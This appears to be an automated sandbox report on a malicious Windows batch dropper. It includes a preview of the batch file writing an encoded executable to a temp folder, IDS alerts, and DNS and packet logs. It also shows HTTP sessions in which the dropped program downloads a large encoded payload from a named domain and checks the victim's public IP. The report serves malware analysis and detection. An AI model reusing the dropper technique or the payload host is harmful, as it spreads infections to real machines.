                                                                                                                                    File Content Preview:@Echo off..echo TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>%tmp%\x..echo AAAAAAAAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4g>>%tmp%\x..echo dW5kZXIgV2luMzINCiQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                    Icon Hash:9686878b929a9886
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-09T19:09:49.222732+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49813 | 41.185.8.252 | 443 | TCP
2025-01-09T19:09:58.095403+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49860 | 158.101.44.242 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                    Jan 9, 2025 19:09:50.599035978 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.599097013 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.675998926 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.676023960 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.676105976 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.676127911 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.676717043 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.676734924 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.676767111 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.676773071 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.676809072 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.676861048 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.678023100 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.678036928 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.678087950 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.678093910 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.678962946 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.678980112 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.679058075 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.679064989 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.679289103 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.679882050 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.679894924 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.679971933 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.679979086 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.681097031 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.682847023 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.682940006 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.683813095 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.683897972 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.684006929 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.684070110 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.684086084 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.684094906 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.684214115 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.800059080 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.800128937 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.800209999 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.800225019 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.800267935 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.801029921 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.801081896 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.801110983 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.801117897 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.801177025 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.801830053 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.801877975 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.801911116 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.801923990 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.801950932 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.801973104 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.802109003 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.802155972 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.802175999 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.802184105 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.802212000 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.802227974 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.803714037 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.803771019 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.803786993 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.803795099 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.803829908 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.803839922 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.804466009 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.804507017 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.804527998 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.804534912 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.804563046 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.804652929 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.804697990 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.804704905 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.804718018 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.804734945 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.804759026 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.804784060 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.805553913 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.805598021 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.805628061 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.805634975 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.805664062 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.805681944 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.886758089 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.886816025 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.886857986 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.886882067 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.886930943 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.886955023 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.887424946 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.887470007 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.887509108 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.887516975 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.887556076 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.887582064 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.888039112 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.888087034 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.888139009 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.888145924 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.888185978 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.888212919 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.888936043 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.888979912 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.889014006 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.889020920 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.889064074 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.890466928 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.890510082 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.890551090 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.890558958 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.890599012 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.890619993 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.891347885 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.891390085 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.891422987 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.891429901 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.891483068 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.891506910 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.892388105 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.892431974 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.892463923 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.892476082 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.892520905 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.892534018 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.892546892 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.892563105 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.892591953 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.892613888 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.892631054 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.892638922 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.892688990 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.892733097 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:51.011271954 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:51.011368036 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:51.011377096 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:51.011399031 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:51.011425018 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:51.011444092 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:51.011965990 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:51.012017012 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:51.012038946 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:51.012046099 CET4434981341.185.8.252192.168.2.6
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Jan 9, 2025 19:09:47.970244884 CET   50280        53         192.168.2.6  1.1.1.1
Jan 9, 2025 19:09:48.305686951 CET   53           50280      1.1.1.1      192.168.2.6
Jan 9, 2025 19:09:57.089534998 CET   49933        53         192.168.2.6  1.1.1.1
Jan 9, 2025 19:09:57.099545002 CET   53           49933      1.1.1.1      192.168.2.6
Jan 9, 2025 19:09:58.173978090 CET   53107        53         192.168.2.6  1.1.1.1
Jan 9, 2025 19:09:58.181843996 CET   53           53107      1.1.1.1      192.168.2.6
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                 Type            Class        DNS over HTTPS
Jan 9, 2025 19:09:47.970244884 CET   192.168.2.6  1.1.1.1  0x79dc    Standard query (0)  lwaziacademy.com     A (IP address)  IN (0x0001)  false
Jan 9, 2025 19:09:57.089534998 CET   192.168.2.6  1.1.1.1  0x17b4    Standard query (0)  checkip.dyndns.org   A (IP address)  IN (0x0001)  false
Jan 9, 2025 19:09:58.173978090 CET   192.168.2.6  1.1.1.1  0x1617    Standard query (0)  reallyfreegeoip.org  A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                 CName               Address         Type                    Class        DNS over HTTPS
Jan 9, 2025 19:09:48.305686951 CET   1.1.1.1    192.168.2.6  0x79dc    No error (0)  lwaziacademy.com     -                   41.185.8.252    A (IP address)          IN (0x0001)  false
Jan 9, 2025 19:09:57.099545002 CET   1.1.1.1    192.168.2.6  0x17b4    No error (0)  checkip.dyndns.org   checkip.dyndns.com  -               CNAME (Canonical name)  IN (0x0001)  false
Jan 9, 2025 19:09:57.099545002 CET   1.1.1.1    192.168.2.6  0x17b4    No error (0)  checkip.dyndns.com   -                   158.101.44.242  A (IP address)          IN (0x0001)  false
Jan 9, 2025 19:09:57.099545002 CET   1.1.1.1    192.168.2.6  0x17b4    No error (0)  checkip.dyndns.com   -                   132.226.247.73  A (IP address)          IN (0x0001)  false
Jan 9, 2025 19:09:57.099545002 CET   1.1.1.1    192.168.2.6  0x17b4    No error (0)  checkip.dyndns.com   -                   193.122.130.0   A (IP address)          IN (0x0001)  false
Jan 9, 2025 19:09:57.099545002 CET   1.1.1.1    192.168.2.6  0x17b4    No error (0)  checkip.dyndns.com   -                   193.122.6.168   A (IP address)          IN (0x0001)  false
Jan 9, 2025 19:09:57.099545002 CET   1.1.1.1    192.168.2.6  0x17b4    No error (0)  checkip.dyndns.com   -                   132.226.8.169   A (IP address)          IN (0x0001)  false
Jan 9, 2025 19:09:58.181843996 CET   1.1.1.1    192.168.2.6  0x1617    No error (0)  reallyfreegeoip.org  -                   104.21.80.1     A (IP address)          IN (0x0001)  false
Jan 9, 2025 19:09:58.181843996 CET   1.1.1.1    192.168.2.6  0x1617    No error (0)  reallyfreegeoip.org  -                   104.21.32.1     A (IP address)          IN (0x0001)  false
Jan 9, 2025 19:09:58.181843996 CET   1.1.1.1    192.168.2.6  0x1617    No error (0)  reallyfreegeoip.org  -                   104.21.96.1     A (IP address)          IN (0x0001)  false
Jan 9, 2025 19:09:58.181843996 CET   1.1.1.1    192.168.2.6  0x1617    No error (0)  reallyfreegeoip.org  -                   104.21.48.1     A (IP address)          IN (0x0001)  false
Jan 9, 2025 19:09:58.181843996 CET   1.1.1.1    192.168.2.6  0x1617    No error (0)  reallyfreegeoip.org  -                   104.21.112.1    A (IP address)          IN (0x0001)  false
Jan 9, 2025 19:09:58.181843996 CET   1.1.1.1    192.168.2.6  0x1617    No error (0)  reallyfreegeoip.org  -                   104.21.16.1     A (IP address)          IN (0x0001)  false
Jan 9, 2025 19:09:58.181843996 CET   1.1.1.1    192.168.2.6  0x1617    No error (0)  reallyfreegeoip.org  -                   104.21.64.1     A (IP address)          IN (0x0001)  false
• lwaziacademy.com
• reallyfreegeoip.org
• checkip.dyndns.org
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.6  49860        158.101.44.242  80                1664  C:\Users\user\AppData\Local\Temp\Microsofts.exe

Timestamp  Bytes transferred  Direction  Data

Jan 9, 2025 19:09:57.115895987 CET  151 bytes  OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Jan 9, 2025 19:09:57.694664001 CET  321 bytes  IN
HTTP/1.1 200 OK
Date: Thu, 09 Jan 2025 18:09:57 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 2902970cf9a5858aa7d5698b6d5ea86b
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Jan 9, 2025 19:09:57.886435986 CET  127 bytes  OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Jan 9, 2025 19:09:58.045954943 CET  321 bytes  IN
HTTP/1.1 200 OK
Date: Thu, 09 Jan 2025 18:09:57 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: b740fee158ee6981a84c439741934fbc
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.6  49813        41.185.8.252    443               5776  C:\Users\user\AppData\Local\Temp\x.exe

Timestamp  Bytes transferred  Direction  Data

2025-01-09 18:09:49 UTC  169 bytes  OUT
GET /wps/200_Oupzhkprnvw HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: lwaziacademy.com

2025-01-09 18:09:49 UTC  182 bytes  IN
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 09 Jan 2025 18:09:49 GMT
Content-Length: 906612
Connection: close
Last-Modified: Fri, 20 Dec 2024 10:43:30 GMT
Accept-Ranges: bytes
                                                                                                                                    Data Ascii: on2AKaEtQpeQBdPcAEVKYQ7Kxa77yk/5ZD6r4AJdOoNTHN7Uo2Fu0j4OE9h1XIekvXuulgNGcjCCsdQVrRAcFTdK3Yd/kpPeBmGUpJmFLKLR6iCTYiygY3/HmOskTOpmP+wGmbcYHMeVm/MiJaB5oMfi9+S5bpFOR8zba2o8aROwbdtaCAyu+80wA2vPQcHWFbT9zQdmDBN8RwJ5+9e9Di6cBDjfYCsRRzXyUAdGe4/HpbD76gZEDyKt/EgQUeC
                                                                                                                                    2025-01-09 18:09:50 UTC16384INData Raw: 46 52 49 74 59 6b 33 48 79 4a 62 2f 69 72 48 2f 53 77 61 79 62 48 53 2b 70 6e 74 74 56 71 72 54 6f 45 41 47 31 78 69 43 71 4c 2b 46 37 74 53 55 32 55 65 6b 79 4f 52 31 30 72 39 42 79 6f 61 43 2f 79 78 32 75 44 30 39 33 73 65 6c 71 38 48 2f 72 4d 77 79 70 47 69 57 35 57 69 66 69 65 6d 32 42 67 51 42 66 33 79 37 4f 65 76 6b 79 48 62 67 4d 53 57 6e 45 74 66 51 45 6a 39 4a 68 64 33 37 31 73 75 7a 43 62 6f 50 42 56 6e 50 75 30 55 4e 45 68 58 67 57 56 68 61 6a 65 45 46 6c 44 45 78 61 41 44 47 35 65 45 56 75 6d 76 47 4e 43 70 41 56 43 5a 5a 79 7a 32 6e 6a 4d 70 4a 69 48 4d 42 4b 76 2b 50 32 41 71 49 65 72 72 62 32 44 37 62 2f 45 37 64 6c 6d 66 68 6a 69 38 6f 68 45 30 6a 6a 51 4b 4e 64 52 32 52 62 4e 71 50 39 42 52 4e 4c 6e 55 74 46 65 56 68 2f 41 4c 53 56 74 58
                                                                                                                                    Data Ascii: FRItYk3HyJb/irH/SwaybHS+pnttVqrToEAG1xiCqL+F7tSU2UekyOR10r9ByoaC/yx2uD093selq8H/rMwypGiW5Wifiem2BgQBf3y7OevkyHbgMSWnEtfQEj9Jhd371suzCboPBVnPu0UNEhXgWVhajeEFlDExaADG5eEVumvGNCpAVCZZyz2njMpJiHMBKv+P2AqIerrb2D7b/E7dlmfhji8ohE0jjQKNdR2RbNqP9BRNLnUtFeVh/ALSVtX
                                                                                                                                    2025-01-09 18:09:50 UTC16384INData Raw: 4c 35 4e 6c 45 4f 4c 57 6f 56 48 31 68 4a 6c 63 35 51 50 73 34 59 64 45 6b 6f 63 49 67 37 2f 76 5a 61 77 47 78 63 68 39 51 4c 77 2f 4a 76 43 56 4e 49 48 42 6b 54 6f 35 47 33 65 58 39 4e 67 6b 52 4a 52 49 70 4f 39 45 4b 4c 53 75 72 39 38 79 2b 4c 51 30 62 6b 64 38 49 2b 70 46 6a 70 48 65 68 6c 36 4f 4f 6b 31 54 38 65 54 50 68 62 76 74 49 6c 4b 73 79 36 30 61 55 41 63 41 34 39 4f 35 6b 54 6e 51 69 61 7a 65 64 56 4a 66 32 55 35 69 5a 31 6a 69 6d 57 2b 55 70 66 52 72 77 68 61 58 64 56 30 79 75 34 61 4e 32 54 41 35 4f 41 78 37 67 4d 76 30 6d 6b 48 6a 64 36 6f 47 30 6a 4c 7a 67 56 63 51 4b 5a 7a 69 38 36 74 57 2f 39 53 34 53 41 65 56 30 4a 61 4e 6d 34 39 49 58 6a 55 47 32 50 35 38 55 37 44 72 75 51 30 66 61 56 2b 61 70 75 4f 69 59 73 4b 61 52 69 52 6f 30 61 39
                                                                                                                                    Data Ascii: L5NlEOLWoVH1hJlc5QPs4YdEkocIg7/vZawGxch9QLw/JvCVNIHBkTo5G3eX9NgkRJRIpO9EKLSur98y+LQ0bkd8I+pFjpHehl6OOk1T8eTPhbvtIlKsy60aUAcA49O5kTnQiazedVJf2U5iZ1jimW+UpfRrwhaXdV0yu4aN2TA5OAx7gMv0mkHjd6oG0jLzgVcQKZzi86tW/9S4SAeV0JaNm49IXjUG2P58U7DruQ0faV+apuOiYsKaRiRo0a9
                                                                                                                                    2025-01-09 18:09:50 UTC16384INData Raw: 53 50 59 6d 62 41 46 6d 35 59 68 55 6f 4a 32 61 6c 6c 2f 53 6d 53 36 66 53 36 33 61 58 36 49 52 30 42 59 32 62 71 48 53 7a 30 37 73 53 37 77 4c 51 76 43 6e 69 76 67 4f 78 4a 6b 49 69 50 33 64 54 2b 70 6d 2b 44 70 67 57 77 33 59 68 39 49 4a 53 2f 4f 51 38 58 55 76 70 73 35 67 6f 64 75 2b 72 47 74 55 70 71 33 4f 43 36 32 45 4a 53 72 66 6f 2f 47 4e 50 2b 72 79 30 52 78 46 67 78 6c 4c 51 50 58 62 4c 42 46 4c 75 4a 56 69 30 2b 66 6f 6d 65 2f 46 4e 4a 68 39 49 30 38 4b 55 53 4d 71 6d 44 64 4c 4e 2f 48 55 72 65 56 69 31 35 69 64 37 6c 70 49 69 67 33 5a 6b 75 75 4e 45 76 38 53 6c 31 4e 78 2f 64 55 61 39 6c 34 64 4c 4a 44 38 4d 4a 43 6b 6b 69 56 6f 50 4d 35 5a 33 45 73 6f 64 6a 44 6b 5a 71 65 47 41 32 73 43 4e 37 59 77 46 41 52 52 41 2f 70 66 72 4f 64 6a 38 57 41
                                                                                                                                    Data Ascii: SPYmbAFm5YhUoJ2all/SmS6fS63aX6IR0BY2bqHSz07sS7wLQvCnivgOxJkIiP3dT+pm+DpgWw3Yh9IJS/OQ8XUvps5godu+rGtUpq3OC62EJSrfo/GNP+ry0RxFgxlLQPXbLBFLuJVi0+fome/FNJh9I08KUSMqmDdLN/HUreVi15id7lpIig3ZkuuNEv8Sl1Nx/dUa9l4dLJD8MJCkkiVoPM5Z3EsodjDkZqeGA2sCN7YwFARRA/pfrOdj8WA
                                                                                                                                    2025-01-09 18:09:50 UTC13696INData Raw: 57 51 69 43 51 41 7a 32 36 6d 75 37 35 2b 4a 72 30 68 47 47 65 58 49 6d 53 76 55 4e 6d 73 35 63 30 46 48 6d 79 50 66 4c 76 47 31 64 6d 31 6b 46 78 59 33 64 4a 48 63 30 38 36 75 5a 75 52 49 34 2b 62 42 79 49 4d 33 68 4f 52 48 6d 4a 37 67 58 34 66 6a 6f 61 72 74 31 32 53 6b 4d 33 7a 75 74 32 7a 70 38 47 38 42 5a 6a 52 49 43 4a 51 4c 4f 69 6a 33 36 59 46 6a 51 35 6a 71 72 73 30 69 63 64 4f 4e 74 4c 71 35 34 46 65 6c 6c 70 51 48 68 30 35 6d 59 6f 61 75 70 56 74 5a 6c 35 46 70 79 56 39 47 71 6c 72 46 51 45 33 73 70 57 6f 48 55 67 35 77 4d 39 70 65 62 53 66 5a 48 33 6b 71 64 49 5a 78 4a 44 42 72 69 6f 6d 78 48 64 62 78 2b 67 41 4e 4b 44 64 4e 65 5a 76 4b 4c 2b 79 31 41 5a 70 4a 6d 2f 48 4d 39 43 53 45 35 4f 62 52 62 65 51 34 2f 53 54 4b 53 33 51 36 59 5a 6f 43
                                                                                                                                    Data Ascii: WQiCQAz26mu75+Jr0hGGeXImSvUNms5c0FHmyPfLvG1dm1kFxY3dJHc086uZuRI4+bByIM3hORHmJ7gX4fjoart12SkM3zut2zp8G8BZjRICJQLOij36YFjQ5jqrs0icdONtLq54FellpQHh05mYoaupVtZl5FpyV9GqlrFQE3spWoHUg5wM9pebSfZH3kqdIZxJDBriomxHdbx+gANKDdNeZvKL+y1AZpJm/HM9CSE5ObRbeQ4/STKS3Q6YZoC
                                                                                                                                    2025-01-09 18:09:50 UTC8000INData Raw: 53 4e 75 79 6b 6f 6a 4f 79 55 77 76 6c 78 4f 2f 4d 57 55 75 54 45 39 41 79 70 49 4f 36 6b 63 46 4c 77 6c 44 5a 76 56 53 54 41 6b 2b 44 4e 38 36 39 6e 50 6b 39 56 39 47 38 56 7a 56 67 74 63 2b 41 35 53 68 38 4a 6f 58 45 51 42 34 5a 45 5a 69 75 63 4b 56 6e 6b 42 6b 4e 4f 68 6c 4b 61 51 70 61 2b 72 6e 55 4d 35 6e 37 65 4e 38 46 5a 51 30 4a 58 76 68 6c 63 63 50 41 5a 68 35 47 32 51 6a 58 2b 32 33 32 31 4c 7a 33 65 58 6c 30 55 33 30 6b 57 6e 4a 6e 32 55 6a 37 56 37 74 4a 2f 76 35 6f 77 2b 78 4f 57 43 2f 75 52 36 52 6d 59 2b 42 31 45 77 52 66 74 56 6c 4a 4e 39 4d 4c 6f 77 4d 33 2f 6d 73 58 6e 36 47 30 5a 61 54 33 5a 55 61 55 49 49 59 48 6b 47 32 71 6f 6c 64 51 51 52 30 74 44 32 73 2f 32 44 79 54 56 6c 31 67 63 4e 70 78 55 57 55 33 4c 31 73 44 6e 66 52 44 43 75
